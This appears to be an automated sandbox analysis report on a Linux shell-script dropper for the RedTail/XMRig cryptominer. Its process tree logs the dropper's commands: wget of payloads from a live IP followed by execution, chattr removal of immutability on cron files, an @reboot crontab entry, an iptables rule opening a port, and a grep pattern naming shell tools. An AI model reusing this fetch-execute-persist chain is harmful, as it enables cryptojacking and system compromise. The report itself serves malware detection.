xmrig | aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-11-2024 07:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sh.sh
Size

1KB
MD5

5a86127d998b5c3496802959ac0a3d11
SHA1

21d05b5a016cdd8245e24778e479bf6330867c3f
SHA256

aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b
SHA512

3270ff6b4bb0dde62180e605a7fc114497df627c8cb5cb4865040e9d287123a4b4855d4e6e386757e9bba0b57f1ef02fb1d81204bfc83612ac87a109962b6e98

Score

10^/10

xmrig antivm defense_evasion discovery execution miner persistence privilege_escalatio upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (75894) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/843-2-0xb6b1f000-0xb6e84454-memory.dmp	xmrig

File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmod

pid process

789 chmod
842 chmod
Executes dropped EXE 1 IoCs

Processes:

.redtail

ioc pid process

/.redtail 843 .redtail

pid	process
789	chmod
842	chmod

ioc	pid	process
/.redtail	843	.redtail

Attempts to change immutable files 24 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

chattrchattrgrepchattrchattrgrepgrepchattrshiptablesgrepchattrgrepchattrchattrchattrchattrchattrgrepchattrgrepchattrchattrgrep

pid	process
817	chattr
818	chattr
821	grep
797	chattr
811	chattr
812	grep
815	grep
820	chattr
859	sh
860	iptables
795	grep
799	chattr
803	grep
808	chattr
814	chattr
819	chattr
798	chattr
802	chattr
806	grep
805	chattr
809	grep
793	chattr
794	chattr
800	grep

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.AqUAGG crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.AqUAGG	crontab

Reads network interface configuration 2 TTPs 6 IoCs

Fetches information about one or more active network interfaces.

discovery

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Processes:

find

description	ioc	process
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0/byte_queue_limits	find
File opened for reading	/sys/devices/virtual/net/lo/queues/rx-0	find
File opened for reading	/sys/devices/virtual/net/lo/statistics	find
File opened for reading	/sys/devices/virtual/net/lo/power	find
File opened for reading	/sys/devices/virtual/net/lo/queues	find

UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
upx

Processes:

resource yara_rule

/arm7 upx
Changes its process name 1 IoCs

Processes:

.redtail

description ioc pid process

Changes the process name, possibly in an attempt to hide itself bash 844 .redtail
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

.redtail

description ioc process

File opened for reading /proc/cpuinfo .redtail

resource	yara_rule
/arm7	upx

description	ioc	pid	process
Changes the process name, possibly in an attempt to hide itself	bash	844	.redtail

description	ioc	process
File opened for reading	/proc/cpuinfo	.redtail

Reads CPU attributes 1 TTPs 27 IoCs

discovery

System Information Discovery

T1082

Processes:

.redtailfind

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/hotplug	find
File opened for reading	/sys/devices/system/cpu/cpu0/hotplug	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology/thread_siblings	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.redtail
File opened for reading	/sys/devices/system/cpu/power	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.redtail
File opened for reading	/sys/devices/system/cpu/cpufreq	find
File opened for reading	/sys/devices/system/cpu/cpu0	find
File opened for reading	/sys/devices/system/cpu/online	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_siblings	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/power	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.redtail

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

find

description	ioc	process
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_poll	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_sendfile64	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_setresgid16	find
File opened for reading	/sys/devices/virtual/mem/random/power	find
File opened for reading	/sys/bus/platform/drivers/sun6i-a31-apb0-clk	find
File opened for reading	/sys/bus/platform/drivers/tegra-pcie	find
File opened for reading	/sys/kernel/debug/tracing/events/spi	find
File opened for reading	/sys/kernel/debug/tracing/events/sched/sched_stat_wait	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_add_key	find
File opened for reading	/sys/firmware/devicetree/base/virtio_mmio@a000200	find
File opened for reading	/sys/kernel/debug/tracing/events/filemap/mm_filemap_delete_from_page_cache	find
File opened for reading	/sys/devices/virtual/tty/tty59/power	find
File opened for reading	/sys/kernel/debug/tracing/events/rpm/rpm_resume	find
File opened for reading	/sys/devices/platform/a002c00.virtio_mmio	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_mq_timedsend	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_utimes	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_fchown	find
File opened for reading	/sys/bus/pci_express/drivers	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_mq_notify	find
File opened for reading	/sys/kernel/debug/tracing/events/ftrace/user_stack	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_accept4	find
File opened for reading	/sys/devices/platform/reg-dummy/regulator/regulator.0	find
File opened for reading	/sys/bus/platform/drivers/sun9i-a80-pinctrl	find
File opened for reading	/sys/kernel/irq/30	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_clock_nanosleep	find
File opened for reading	/sys/kernel/debug/tracing/events/rcu	find
File opened for reading	/sys/kernel/debug/tracing/events/power/dev_pm_qos_update_request	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_epoll_ctl	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_fanotify_mark	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_setdomainname	find
File opened for reading	/sys/firmware/devicetree/base/cpus	find
File opened for reading	/sys/module/tpm	find
File opened for reading	/sys/kernel/debug/tracing/events/compaction/mm_compaction_finished	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_exit	find
File opened for reading	/sys/devices/platform/a003c00.virtio_mmio/virtio0/block/vda/holders	find
File opened for reading	/sys/class/net	find
File opened for reading	/sys/fs/cgroup/systemd/system.slice/system-getty.slice/[email protected]	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_creat	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_get_robust_list	find
File opened for reading	/sys/devices/virtual/vc/vcs4/power	find
File opened for reading	/sys/firmware/devicetree/base/virtio_mmio@a000400	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_da_write_pages	find
File opened for reading	/sys/kernel/debug/tracing/events/vmscan/mm_vmscan_wakeup_kswapd	find
File opened for reading	/sys/kernel/debug/tracing/events/sched/sched_move_numa	find
File opened for reading	/sys/kernel/debug/tracing/events/signal/signal_generate	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_fchmodat	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_munlock	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_fork	find
File opened for reading	/sys/fs/cgroup/pids/user.slice/user-0.slice/session-c1.scope	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_mb_new_group_pa	find
File opened for reading	/sys/bus/platform/drivers/gpio-clk	find
File opened for reading	/sys/bus/pci_express/drivers/aer	find
File opened for reading	/sys/fs/cgroup/devices/system.slice/systemd-journal-flush.service	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_ext_handle_unwritten_extents	find
File opened for reading	/sys/kernel/debug/tracing/events/net/net_dev_start_xmit	find
File opened for reading	/sys/kernel/debug/tracing/events/regulator/regulator_enable	find
File opened for reading	/sys/kernel/debug/tracing/events/writeback/bdi_dirty_ratelimit	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_timerfd_settime	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_setreuid	find
File opened for reading	/sys/devices/platform/a001c00.virtio_mmio	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_mb_release_inode_pa	find
File opened for reading	/sys/fs/cgroup/devices/system.slice/system-getty.slice	find
File opened for reading	/sys/module/rcutree	find
File opened for reading	/sys/class/block	find

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

find.redtailcat

description	ioc	process
File opened for reading	/proc/291/map_files	find
File opened for reading	/proc/457/fd	find
File opened for reading	/proc/318/cmdline	.redtail
File opened for reading	/proc/16/task/16/net/netfilter	find
File opened for reading	/proc/25/attr	find
File opened for reading	/proc/103/task/103/attr	find
File opened for reading	/proc/154/ns	find
File opened for reading	/proc/222/task/222/net/netfilter	find
File opened for reading	/proc/277/net/stat	find
File opened for reading	/proc/309/fd	find
File opened for reading	/proc/395/ns	find
File opened for reading	/proc/7/task/7/net/netfilter	find
File opened for reading	/proc/20/task	find
File opened for reading	/proc/13/task	find
File opened for reading	/proc/15/ns	find
File opened for reading	/proc/146/task/146/ns	find
File opened for reading	/proc/330/task/330/net	find
File opened for reading	/proc/330/task/330/attr	find
File opened for reading	/proc/656/net/netfilter	find
File opened for reading	/proc/sys/net/ipv4/conf/lo	find
File opened for reading	/proc/1/net	find
File opened for reading	/proc/22/task/22	find
File opened for reading	/proc/28/task	find
File opened for reading	/proc/277/task/277	find
File opened for reading	/proc/bus/input	find
File opened for reading	/proc/sys/fs/epoll	find
File opened for reading	/proc/irq/16	find
File opened for reading	/proc/154/task/154/net	find
File opened for reading	/proc/42	find
File opened for reading	/proc/154	find
File opened for reading	/proc/307/map_files	find
File opened for reading	/proc/456/net/stat	find
File opened for reading	/proc/mounts	cat
File opened for reading	/proc/22/net/stat	find
File opened for reading	/proc/114/task/114/net/stat	find
File opened for reading	/proc/144/ns	find
File opened for reading	/proc/288/net/dev_snmp6	find
File opened for reading	/proc/411/task/411/ns	find
File opened for reading	/proc/411/ns	find
File opened for reading	/proc/612/task/612/fd	find
File opened for reading	/proc/19/task/19/fdinfo	find
File opened for reading	/proc/42/net/stat	find
File opened for reading	/proc/114/net/netfilter	find
File opened for reading	/proc/277/task/277/ns	find
File opened for reading	/proc/307/task/307/net/dev_snmp6	find
File opened for reading	/proc/395/task/395/net/netfilter	find
File opened for reading	/proc/irq/58/GPIO Key Poweroff	find
File opened for reading	/proc/16/task/16/fd	find
File opened for reading	/proc/318/fd	find
File opened for reading	/proc/456/net	find
File opened for reading	/proc/457/task/457/ns	find
File opened for reading	/proc/8/fd	find
File opened for reading	/proc/9/net/netfilter	find
File opened for reading	/proc/12/task/12/fdinfo	find
File opened for reading	/proc/19/task/19	find
File opened for reading	/proc/23/task/23/net	find
File opened for reading	/proc/144/fdinfo	find
File opened for reading	/proc/222/task/222/fd	find
File opened for reading	/proc/309/task/309/net/dev_snmp6	find
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/sysvipc	find
File opened for reading	/proc/661/attr	find
File opened for reading	/proc/395/task/395/net	find
File opened for reading	/proc/657/task/657/net/dev_snmp6	find

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

sh

description ioc process

File opened for modification /tmp/clean_crontab sh

description	ioc	process
File opened for modification	/tmp/clean_crontab	sh

/tmp/sh.sh
/tmp/sh.sh
1⤵
PID:657
- /bin/grep
  grep noexec
  2⤵
  PID:667
- /bin/cat
  cat /proc/mounts
  2⤵
  - Reads runtime system information
  PID:666
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:668
- /usr/bin/whoami
  whoami
  2⤵
  PID:674
- /usr/bin/find
  find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*"
  2⤵
  - Reads network interface configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:677
- /bin/uname
  uname -mp
  2⤵
  PID:783
- /usr/bin/touch
  touch .testfile
  2⤵
  PID:784
- /bin/dd
  dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
  2⤵
  PID:786
- /bin/rm
  rm -rf .testfile .testfile2
  2⤵
  PID:787
- /usr/bin/wget
  wget http://45.202.35.190/clean
  2⤵
  PID:788
- /bin/chmod
  chmod +x clean
  2⤵
  - File and Directory Permissions Modification
  PID:789
- /bin/sh
  sh clean
  2⤵
  - Writes file to tmp directory
  PID:790
- - /bin/systemctl
    systemctl disable c3pool_miner
    3⤵
    PID:791
- - /bin/systemctl
    systemctl stop c3pool_miner
    3⤵
    PID:792
- - /usr/bin/chattr
    chattr -ia /var/spool/cron/crontabs
    3⤵
    - Attempts to change immutable files
    PID:793
- - /usr/bin/chattr
    chattr -ia /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:794
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:795
- - /bin/mv
    mv /tmp/clean_crontab /etc/crontab
    3⤵
    PID:796
- - /usr/bin/chattr
    chattr -ia /etc/cron.hourly
    3⤵
    - Attempts to change immutable files
    PID:797
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily
    3⤵
    - Attempts to change immutable files
    PID:798
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:799
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:800
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/apt-compat
    3⤵
    PID:801
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:802
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:803
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
    3⤵
    PID:804
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:805
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:806
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/dpkg
    3⤵
    PID:807
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:808
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:809
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/exim4-base
    3⤵
    PID:810
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:811
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:812
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/logrotate
    3⤵
    PID:813
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:814
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:815
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/passwd
    3⤵
    PID:816
- - /usr/bin/chattr
    chattr -ia /etc/cron.weekly
    3⤵
    - Attempts to change immutable files
    PID:817
- - /usr/bin/chattr
    chattr -ia /etc/cron.monthly
    3⤵
    - Attempts to change immutable files
    PID:818
- - /usr/bin/chattr
    chattr -ia /etc/cron.d
    3⤵
    - Attempts to change immutable files
    PID:819
- - /usr/bin/chattr
    chattr -ia /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:820
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:821
- - /bin/mv
    mv /tmp/clean_crontab /etc/anacrontab
    3⤵
    PID:822
- - /bin/rm
    rm -rf /tmp/sh.sh
    3⤵
    PID:823
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:824
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:825
- /bin/rm
  rm -rf clean
  2⤵
  PID:826
- /bin/rm
  rm -rf .redtail
  2⤵
  PID:827
- /bin/grep
  grep -q x86_64
  2⤵
  PID:829
- /bin/grep
  grep -q amd64
  2⤵
  PID:831
- /bin/grep
  grep -q "i[3456]86"
  2⤵
  PID:833
- /bin/grep
  grep -q armv8
  2⤵
  PID:835
- /bin/grep
  grep -q aarch64
  2⤵
  PID:837
- /bin/grep
  grep -q armv7
  2⤵
  PID:839
- /usr/bin/wget
  wget http://45.202.35.190/arm7
  2⤵
  PID:840
- /bin/mv
  mv arm7 .redtail
  2⤵
  PID:841
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:842
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  - Changes its process name
  - Checks CPU configuration
  - Reads CPU attributes
  - Reads runtime system information
  PID:843
- - /bin/sh
    sh -c "command -v crontab >/dev/null 2>&1"
    3⤵
    PID:845
- - /bin/sh
    sh -c "crontab -r >/dev/null 2>&1; echo \"@reboot /.redtail\" | crontab -"
    3⤵
    PID:847
  - - /usr/bin/crontab
      crontab -r
      4⤵
      PID:849
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:851
- - /bin/sh
    sh -c "command -v php >/dev/null 2>&1"
    3⤵
    PID:852
- - /bin/sh
    sh -c "command -v nginx >/dev/null 2>&1"
    3⤵
    PID:853
- - /bin/sh
    sh -c "which apache2"
    3⤵
    PID:854
  - - /usr/bin/which
      which apache2
      4⤵
      PID:855
- - /bin/sh
    sh -c "which httpd"
    3⤵
    PID:856
  - - /usr/bin/which
      which httpd
      4⤵
      PID:857
- - /bin/sh
    sh -c "iptables -I INPUT -p tcp --dport 35757 -j ACCEPT >/dev/null 2>&1"
    3⤵
    - Attempts to change immutable files
    PID:859
  - - /sbin/iptables
      iptables -I INPUT -p tcp --dport 35757 -j ACCEPT
      4⤵
      Attempts to change immutable files
      PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/.testfile2

Filesize
2.0MB

MD5
b2d1236c286a3c0704224fe4105eca49

SHA1
7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6

SHA256
5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee

SHA512
731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

Download Submit
/arm7

Filesize
1.1MB

MD5
045daa66263bfd467051c013e9222faf

SHA1
4b943b14526d7bf7be2b3e3f9af24d1f35015548

SHA256
d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

SHA512
bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

Download Submit
/clean

Filesize
795B

MD5
397ff5e54194072e6d8a44a0d8cc1b27

SHA1
42477b0c3b277b5e907b0a35c644f3291ed30a63

SHA256
d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e

SHA512
ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
30e858769aacd9cc309502f8d5c6aa0f

SHA1
927c06dd4d6cbb5ca02e9505011c8667c47f2d6e

SHA256
eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd

SHA512
f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

Download Submit
/tmp/clean_crontab

Filesize
3KB

MD5
02f33c9e59b27bcd241e488cd48de072

SHA1
9247eee9b2310d56455beccf41c577ba16b78e3d

SHA256
2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14

SHA512
1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

Download Submit
/tmp/clean_crontab

Filesize
249B

MD5
db990990933b6f56322725223f13c2bc

SHA1
387303696a796e27f559c73679e979f2a538072d

SHA256
777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1

SHA512
a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

Download Submit
/tmp/clean_crontab

Filesize
722B

MD5
8f111d100ea459f68d333d63a8ef2205

SHA1
077ca9c46a964de67c0f7765745d5c6f9e2065c3

SHA256
0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354

SHA512
d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
bc4a71cbcaeed4179f25d798257fa980

SHA1
61445721d0b5d86ac0a8386a4ceef450118f4fbb

SHA256
8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

SHA512
709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

Download Submit
/tmp/clean_crontab

Filesize
279B

MD5
911a774fe040993b929504f3d9415ab3

SHA1
55ccc8e95097f005abf9f4d91a14394e6d0f5da5

SHA256
340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

SHA512
1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

Download Submit
/var/spool/cron/crontabs/tmp.AqUAGG

Filesize
193B

MD5
e3b3ca44afc59948c8acff9b3260fe44

SHA1
d1d3b70c2c323193703b00ef21840ccd968310bd

SHA256
9054e98a8feb2a425262131f0e1de17d17f6a46eaa6362d5044c1289ed374f86

SHA512
690259f17c7a15a9a4691a515be70868604122c5c70062221e1012e40345bfed9fb49f77271b8fb02bc6cc9c97eb446becd762314ae0a79818b720f51a6d9159

Download Submit
memory/837-1-0xb6be8000-0xb6bf9044-memory.dmp

Download
memory/843-2-0xb6b1f000-0xb6e84454-memory.dmp

Download